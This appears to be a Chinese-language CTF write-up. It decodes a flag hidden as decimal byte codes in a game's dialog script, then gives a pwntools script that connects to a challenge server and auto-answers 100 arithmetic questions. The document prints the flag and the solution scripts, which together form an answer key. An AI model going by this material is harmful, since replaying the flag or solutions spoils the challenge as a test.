main_24@act_dialog^^^main_26@act_bgm^^^0^^083104105110111058032227128142231156139232181183230157165230156137231130185229131143046046046046230136145232135170229183177239188159227128143013010035048
main_26@act_bgm^filename@050057046109112051#vol@053048050^^main_27@act_se^^^0^^050054045048
main_27@act_se^filename@121117107117109111095048048048054046109112051#vol@056048048^^main_29@act_dialog^^^0^^050055045048
main_29@act_dialog^^^main_31@act_se^^^0^^239188159239188159239188159239188154227128142229141131228184135232166129229176143229191131046046046227128143013010035048
main_31@act_se^filename@121117107117109111095048048048055046109112051#vol@056048048^^main_33@act_dialog^^^0^^051049045048
main_33@act_dialog^^^main_35@act_se^^^0^^239188159239188159239188159239188154227128142232191155229133165230160161229155173229144142239188140229143175232131189228188154230156137228184128228184170229165135230128170231154132229165179228186186230137190228184138228189160227128130227128143013010035048
main_35@act_se^filename@121117107117109111095048048048056046109112051#vol@056048048^^main_37@act_dialog^^^0^^051053045048
main_37@act_dialog^^^main_39@act_deletecstand^^^0^^239188159239188159239188159239188154227128142229165185230136180231157128231187191232137178229184189229173144239188140228184128229164180231153189229143145227128130232153189231132182231156139232181183230157165229190136229143175231136177239188140228189134229133182229174158232131140229144142230156137228184128228184170229188186229164167231154132231165158231167152231187132231187135227128130227128143013010035048
main_39@act_deletecstand^id@048^^main_40@act_bg^^^0^^051057045048
main_40@act_bg^id@049#filename@067078083083046112110103#x@#y@#opacity@#xscale@#yscale@#ro@045050053^^main_41@act_se^^^0^^052048045048
main_41@act_se^filename@121117107117109111095048048048057046109112051#vol@056048048^^main_43@act_dialog^^^0^^052049045048
main_43@act_dialog^^^main_45@act_se^^^0^^239188159239188159239188159239188154227128142229144172232175180230142165232167166228186134232191153228184170231165158231167152231187132231187135231154132228186186239188140233131189230151160228184128228190139229164150229156176232142183229190151228186134229188186229164167231154132229138155233135143227128130227128143013010035048
main_45@act_se^filename@121117107117109111095048048049048046109112051#vol@056048048^^main_47@act_dialog^^^0^^052053045048
main_47@act_dialog^^^main_49@act_se^^^0^^239188159239188159239188159239188154227128142230184151233128143230181139232175149227128129232189175228187182231160180232167163227128129229188128229143145232191144231187180046046046230149176228184141230184133231154132233171152231171175231165158231167152230138128230156175229156168232191153228184170231187132231187135233135140228187163228187163231155184228188160227128130227128143013010035048
main_49@act_se^filename@121117107117109111095048048049049046109112051#vol@056048048^^main_51@act_dialog^^^0^^052057045048
main_51@act_dialog^^^main_53@act_se^^^0^^239188159239188159239188159239188154227128142229144132231167141229165150233161185229165150233135145227128129228191157231160148229138160229136134227128129229164167229142130111102102101114239188140229133168233131189232162171232191153228184170231187132231187135231154132228186186230143161229156168230137139228184173227128130227128143013010035048
main_53@act_se^filename@121117107117109111095048048049050046109112051#vol@056048048^^main_55@act_dialog^^^0^^053051045048
main_55@act_dialog^^^main_57@act_se^^^0^^239188159239188159239188159239188154227128142229144172232175180228187150228187172232191152228188154231187143229184184228184190229138158228184128231167141231165158231167152228187170229188143239188140228184128231190164228186186229155180229156168229165182232140182229186151230151129232190185231148168228184141231159165233129147229147170233135140230157165231154132229164167233135143231187143232180185229164167229150157231137185229150157227128130227128143013010035048
main_57@act_se^filename@121117107117109111095048048049051046109112051#vol@056048048^^main_59@act_dialog^^^0^^053055045048
main_59@act_dialog^^^main_61@act_se^^^0^^239188159239188159239188159239188154227128142233130163228184170229165179228186186232191152228188154230139191230137128232176147032102108097103032230157165232175177230131145228189160227128130230136145229183178231187143229129183229129183230139191229136176228186134233130163228184170228184156232165191227128130227128143013010035048
main_61@act_se^filename@121117107117109111095048048049052046109112051#vol@056048048^^main_63@act_dialog^^^0^^054049045048
main_63@act_dialog^^^main_65@act_se^^^0^^239188159239188159239188159239188154227128142230136145232191153229176177230138138229174131229145138232175137228189160239188140229141131228184135228184141232166129231157128228186134229165185231154132233129147239188129227128143013010035048
main_65@act_se^filename@121117107117109111095048048049053046109112051#vol@056048048^^main_66@act_bg^^^0^^054053045048
main_66@act_bg^id@049#filename@099111110118101114049046112110103#x@#y@#opacity@#xscale@#yscale@#ro@045051048^^main_67@act_wait^^^0^^054054045048
main_67@act_wait^time@051048048048^^main_68@act_bg^^^0^^054055045048
main_68@act_bg^id@049#filename@100111111114046106112103#x@#y@#opacity@#xscale@#yscale@#ro@045050053^^main_69@act_cstand^^^0^^054056045048
main_69@act_cstand^id@049#name@083104105110111#face@050#x@049051048#y@049051048#loc@^^main_71@act_dialog^^^0^^054057045048
main_71@act_dialog^^^main_73@act_deletecstand^^^0^^239188129239188129013010035048
main_73@act_deletecstand^id@048^^main_74@act_se^^^0^^055051045048
main_74@act_se^filename@121117107117109111095048048049054046109112051#vol@056048048^^main_75@act_bg^^^0^^055052045048
main_75@act_bg^id@049#filename@099111110118101114050046112110103#x@#y@#opacity@#xscale@#yscale@#ro@045051048^^main_76@act_wait^^^0^^055053045048
main_76@act_wait^time@051048048048^^main_77@act_se^^^0^^055054045048
main_77@act_se^filename@121117107117109111095048048049055046109112051#vol@056048048^^main_78@act_bg^^^0^^055055045048
main_78@act_bg^id@049#filename@079110108121067078083083046112110103#x@#y@#opacity@#xscale@#yscale@#ro@045051048^^main_79@act_wait^^^0^^055056045048
main_79@act_wait^time@049053048048048^^main_80@act_bg^^^0^^055057045048
main_80@act_bg^id@049#filename@098108097110107046112110103#x@#y@#opacity@#xscale@#yscale@#ro@045051048^^main_81@act_stopbgm^^^0^^056048045048
main_81@act_stopbgm^^^main_82@act_cstand^^^0^^056049045048
main_82@act_cstand^id@048#name@083104105110111#face@051#x@049051048#y@049051048#loc@^^main_83@act_se^^^0^^056050045048
main_83@act_se^filename@121117107117109111095048048049056046109112051#vol@056048048^^main_85@act_dialog^^^0^^056051045048
main_85@act_dialog^^^main_87@act_bg^^^0^^083104105110111058227128142231165158226128148226128148231167152226128148226128148228186186226128148226128148227128143013010035048
main_87@act_bg^id@049#filename@100111111114046106112103#x@#y@#opacity@#xscale@#yscale@#ro@045050053^^main_88@act_bgm^^^0^^056055045048
main_88@act_bgm^filename@050053046109112051#vol@052057056^^main_89@act_deletecstand^^^0^^056056045048
main_89@act_deletecstand^id@048^^main_90@act_cstand^^^0^^056057045048
main_90@act_cstand^id@048#name@067078083083#face@049#x@049051048#y@049051048#loc@^^main_91@act_se^^^0^^057048045048
main_91@act_se^filename@121117107117109111095048048049057046109112051#vol@056048048^^main_93@act_dialog^^^0^^057049045048
main_93@act_dialog^^^main_95@act_se^^^0^^229143175231136177231154132229165179229173169058227128142228184141229143175228187165229144172228187150231158142232175180229147166227128130227128143013010035048
main_95@act_se^filename@121117107117109111095048048050048046109112051#vol@056048048^^main_97@act_dialog^^^0^^057053045048
main_97@act_dialog^^^main_99@act_se^^^0^^083104105110111058227128142231187191232137178229184189229173144239188140228184128229164180231153189229143145239188140231156139232181183230157165229190136229143175231136177046046046046046033033033033227128143013010035048
main_99@act_se^filename@121117107117109111095048048050049046109112051#vol@056048048^^main_101@act_dialog^^^0^^057057045048
main_101@act_dialog^^^main_103@act_se^^^0^^083104105110111058227128142233154190233129147228189160229176177230152175226128148226128148227128143013010035048
main_103@act_se^filename@121117107117109111095048048050050046109112051#vol@056048048^^main_105@act_dialog^^^0^^049048051045048
main_105@act_dialog^^^main_107@act_se^^^0^^083104105110111058227128142228184150231149140231172172228184128229143175231136177231154132032067078083083032229168152239188129227128143013010035048
main_107@act_se^filename@121117107117109111095048048050052046109112051#vol@056048048^^main_109@act_dialog^^^0^^049048055045048
main_109@act_dialog^^^main_111@act_se^^^0^^229143175231136177231154132229165179229173169058227128142230152175231154132239188140230136145229176177230152175032067078083083032229168152229147166227128130227128143013010035048
main_111@act_se^filename@121117107117109111095048048050053046109112051#vol@056048048^^main_113@act_dialog^^^0^^049049049045048
main_113@act_dialog^^^main_115@act_se^^^0^^067078083083032229168152058227128142230136145228187172229135157232129154231189145231187156229174137229133168229183165228189156229174164230172162232191142230175143228184128228189141229175185231189145231187156229174137229133168230136150229188128229143145232191144231187180230132159229133180232182163231154132230150176231148159229138155233135143229138160229133165239188129227128143013010035048
main_115@act_se^filename@121117107117109111095048048050054046109112051#vol@056048048^^main_117@act_dialog^^^0^^049049053045048
main_117@act_dialog^^^main_119@act_se^^^0^^067078083083032229168152058227128142229185182228184141230152175228187128228185136229143175230128149231154132233130170230149153231187132231187135229147166239188129227128143013010035048
main_119@act_se^filename@121117107117109111095048048050055046109112051#vol@056048048^^main_121@act_dialog^^^0^^049049057045048
main_121@act_dialog^^^main_123@act_se^^^0^^067078083083032229168152058227128142232175180228186134232191153228185136229164154239188140229133182229174158228189160230160185230156172228184141229156168230132143230136145228187172229134153228186134228187128228185136229137167230156172239188140228189160229133179229191131231154132229143170230156137032102108097103032229175185229144167239188129227128143013010035048
main_123@act_se^filename@121117107117109111095048048050056046109112051#vol@056048048^^main_125@act_dialog^^^0^^049050051045048
main_125@act_dialog^^^main_127@act_se^^^0^^067078083083032229168152058227128142230136145232191153229176177229145138232175137228189160229147166239188129227128143013010035048
main_127@act_se^filename@121117107117109111095048048050057046109112051#vol@056048048^^main_129@act_dialog^^^0^^049050055045048
main_129@act_dialog^^^main_131@act_deletecstand^^^0^^083104105110111058227128142229165185230173163229156168230130132230130132230139137232191145229146140230136145231154132232183157231166187046046046229165189231180167229188160239188129227128143013010035048
main_131@act_deletecstand^id@048^^main_132@act_picture^^^0^^049051049045048
main_132@act_picture^id@048#filename@067078083083095112110103046112110103#x@053048048#y@051048048#opacity@049#xscale@049046051#yscale@049046051#ro@048^^main_133@act_se^^^0^^049051050045048
main_133@act_se^filename@121117107117109111095048048051048046109112051#vol@056048048^^main_135@act_dialog^^^0^^049051051045048
main_135@act_dialog^^^main_137@act_se^^^0^^083104105110111058227128142230157165229136176229175185232175157230161134229137141233157162228186134239188129227128143013010035048
main_137@act_se^filename@121117107117109111095048048051049046109112051#vol@056048048^^main_139@act_dialog^^^0^^049051055045048
main_139@act_dialog^^^main_142@act_dialog^^^0^^067078083083032229168152058227128142102108097103229176177230152175226128148226128148239188129102108097103230152175099110115115123087048119033089048117095052114101095075049110103095048102095082051086051051115051051095033033033033033033125229147166239188129232174176228189143228186134229144151239188159227128143013010035049
main_142@act_dialog^^^main_144@act_deletepicture^^^0^^067078083083032229168152058227128142229191171229142187230143144228186164229144167239188129227128143013010035048
main_144@act_deletepicture^id@048^^main_145@act_se^^^0^^049052052045048
main_145@act_se^filename@121117107117109111095048048051050046109112051#vol@056048048^^main_147@act_dialog^^^0^^049052053045048
main_147@act_dialog^^^main_150@act_dialog^^^0^^083104105110111058227128142046046046046231173137231173137239188140229165185232175180228186134229149165239188159227128143013010035049
main_150@act_dialog^^^main_152@act_shutdown^^^0^^045045084072069032069078068045045013010035048
main_152@act_shutdown^^^^^^0^^049053050045048
main_155@act_function^sign@114099108105099107040041^^^main_157@act_endfunction^^1^^049053053045048
main_157@act_endfunction^^^^^^0^^049053055045048

然后去官方的技术文档那搜索了一下

符号“@”表示当前行是可执行命令,Action是命令名称,ParameterName是命令参数的名字,ParameterValueExpression是要赋值给等号左侧参数的表达式,省略号表示一个命令既可以没有<参数, 值>对,也可以有多个<参数, 值>对。注意到,一个命令如果带有多个参数时,参数是没有先后顺序要求的;而符号“#”表明当前行是注释,编译器在做语法分析时将略过它;推导符号Dialog代表在游戏执行过程中要显示的文本,这是AVG游戏使用频率最高的命令,由于文本的显示存在跨行的情况,因此它以一种上下文有关文法来表示

Dialog是文本框相关的,然后这些数字也有规律三个一组的像ascii码一样的,然后尝试搜cnss{的ascii码099110115115123搜到了,把后面的字符串拷贝下来然后python三个三个读拿到flag cnss{W0w!Y0u_4re_K1ng_0f_R3V33s33_!!!!!!}

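# Operand text taken from the decrypted act_dialog record that contains the "cnss{" prefix:
# every three decimal digits are one byte value.
s = "099110115115123087048119033089048117095052114101095075049110103095048102095082051086051051115051051095033033033033033033125229147166239188129232174176228189143228186134229144151239188159227128143013010035049"
# The bytes are UTF-8, so decode them as one byte string; calling chr() on each byte
# separately prints the ASCII flag correctly but garbles the multi-byte text after it.
decoded = bytes(int(s[i:i+3]) for i in range(0, len(s), 3)).decode("utf-8", errors="replace")
print(decoded, end="")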

pwn

🎮 nc,启动

nc连

😡 让我访问!!!

pwntools

from pwn import *
import re

host, port = "43.156.14.141", 1141
p = remote(host, port)

# The service asks two (y/n) questions before the quiz starts; answer "y" to both.
for _prompt in range(2):
    p.recvuntil(b"(y/n)\n")
    p.sendline(b"y")

# 100 rounds of "<number> <operator> <number>": pull the three tokens out of the line and
# reply with the result. Anything that is not "+" is answered as a subtraction.
for _round in range(100):
    line = p.recvline().decode('utf-8')
    lhs, op, rhs = re.findall(r'(\d+|\+|\-|\*|\/)', line)
    lhs, rhs = int(lhs), int(rhs)
    answer = lhs + rhs if op == "+" else lhs - rhs
    p.sendline(str(answer).encode('utf-8'))

# Afterwards, relay typed lines to the service and show one reply line per input.
while True:
    ss = input()
    p.sendline(ss.encode('utf-8'))
    print(p.recvline())

👀 你的名字
